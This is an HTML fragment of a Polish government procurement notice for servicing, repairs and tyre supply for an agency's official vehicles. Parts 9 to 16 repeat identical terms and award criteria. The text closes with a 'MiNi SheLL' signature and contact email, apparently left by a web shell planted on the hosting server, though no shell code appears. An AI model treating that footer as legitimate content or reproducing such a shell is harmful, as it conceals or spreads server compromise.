2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie częściowe nr 9..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie częściowe nr 10..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie częściowe nr 11..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie częściowe nr 12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie częściowe nr 13..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie częściowe nr 14..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie częściowe nr 15..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie częściowe nr 16..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie przeglądów pogwarancyjnych, napraw samochodów służbowych, przeglądów rejestracyjnych, sezonowa wymiana opon, zakup opon oraz akcesoriów do samochodów będących na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR. Zestawienie pojazdów (zawierające m.in. markę, rok produkcji oraz stan licznika) stanowi załącznik nr 1 do Istotnych postanowień umowy.
2. W związku z tym, iż samochody służbowe będące na wyposażeniu Centrali ARR oraz Oddziałów Terenowych ARR pokonują rocznie od 25 000 do 50 000 km, wymagają od 3 do maksymalnie 4 przeglądów w ciągu roku. Zamawiający zastrzega sobie możliwość zmiany w ilości przeglądów w ciągu roku.
3. Wykonawca musi dysponować co najmniej 2 serwisami wykonującymi kompleksowe usługi (naprawy pogwarancyjne, przeglądy pogwarancyjne, wulkanizację, wymianę oraz sprzedaż opon) w odległości nie większej niż 30 km od siedziby Oddziału Terenowego ARR właściwego dla danej części zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.10.00.00-6, 34.33.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 75</li>
<li>2. Wysokość stałego rabatu od obowiązującego cennika na części oraz płyny eksploatacyjne - 20</li>
<li>3. Wysokość stałego rabatu od obowiązującego cennika na zakup opon - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com